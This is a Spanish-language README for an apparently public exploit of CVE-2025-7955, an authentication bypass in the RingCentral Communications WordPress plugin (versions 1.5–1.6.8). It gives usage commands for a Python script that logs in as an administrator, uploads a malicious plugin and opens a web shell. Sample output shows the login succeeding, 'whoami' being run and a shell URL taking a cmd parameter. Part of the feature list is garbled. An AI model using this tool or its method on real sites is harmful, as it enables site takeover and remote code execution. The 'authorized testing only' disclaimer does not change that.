
RingCentral Communications 1.5 - 1.6.8 - Falta de verificación del lado del servidor que conduce a la omisión de autenticación a través de la función ringcentral_admin_login_2fa_verify
RingCentral Communications 1.5 - 1.6.8 - Falta de verificación del lado del servidor para la omisión de autenticación mediante la función ringcentral_admin_login_2fa_verify
CVE: CVE-2025-7955
Plugin afectado: RingCentral Communications (WordPress)
Versiones afectadas: 1.5 – 1.6.8
Puntuación CVSS: 9.8 (Crítica)
Tipo: Omisión de autenticación (Falta de verificación del lado del servidor)
El plugin RingCentral Communications para WordPress es vulnerable a una omisión de autenticación debido a una validación incorrecta dentro de la función
ringcentral_admin_login_2fa_verify(). Las versiones 1.5 a 1.6.8 permiten a atacantes no autenticados iniciar sesión como cualquier usuario simplemente suministrando códigos falsos idénticos.
Este exploit automatiza toda la cadena de ataque para CVE-2025-7955. Está diseñado para:
/wp-json/wp/v2/users/ID).whoami a través del shell e imprime la salida.Prepara tu plugin malicioso
Asegúrate de tener tu archivo ZIP de plugin malicioso (por defecto: Nxploit.zip) en el mismo directorio que el script.
Ejecuta el exploit:
python3 CVE-2025-7955.py -u http://target/wordpress [-user admin] [-id 1] [-z Nxploit.zip]
-u, --url : (obligatorio) URL del sitio WordPress objetivo-user, --username : (opcional) Nombre de usuario con el que iniciar sesión (se descubre automáticamente si se omite)-id, --id_admin : (por defecto: 1) ID de usuario (admin suele ser ID 1)-z, --zip : (por defecto: Nxploit.zip) Ruta al ZIP del plugin maliciosoEjemplo:
python3 CVE-2025-7955.py -u http://target/wordpress
o especifica usuario/ID:
python3 CVE-2025-7955.py -u http://target/wordpress -user admin -id 1
888b 888 888 d8b 888 888
8888b 888 888 Y8P 888 888
88888b 888 888 888 888
888Y88b 888 888 888 88888b. 888 .d88b. 888 888888 .d88b. .d88888
888 Y88b888 `Y8bd8P' 888 "88b 888 d88""88b 888 888 d8P Y8b d88" 888
888 Y88888 X88K 888 888 888 888 888 888 888 88888888 888 888
888 Y8888 .d8""8b. 888 d88P 888 Y88..88P 888 Y88b. Y8b. Y88b 888
888 Y888 888 888 88888P" 888 "Y88P" 888 "Y888 "Y8888 "Y88888
888
888
888
CVE-2025-7955 Exploit By : Nxploited
[*] Using User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
[*] Attempting login as: admin (ID: 1)
[+] Login successful!
[+] Nonce: 661e57f2e4
[*] Uploading malicious plugin...
[+] Plugin uploaded successfully!
[*] Executing: whoami
----------------------------------------
daemon
----------------------------------------
[+] Shell: http://target/wordpress/wp-content/plugins/Nxploit/index.php?cmd=COMMAND
Esta herramienta es solo para pruebas de seguridad autorizadas y uso educativo.
El uso no autorizado contra sistemas que no posees o para los que no tienes permiso explícito para realizar pruebas es ilegal y poco ético.
El autor no asume ninguna responsabilidad por cualquier mal uso o daños causados por este script.
Por: Khaled Alenazi (Nxploited)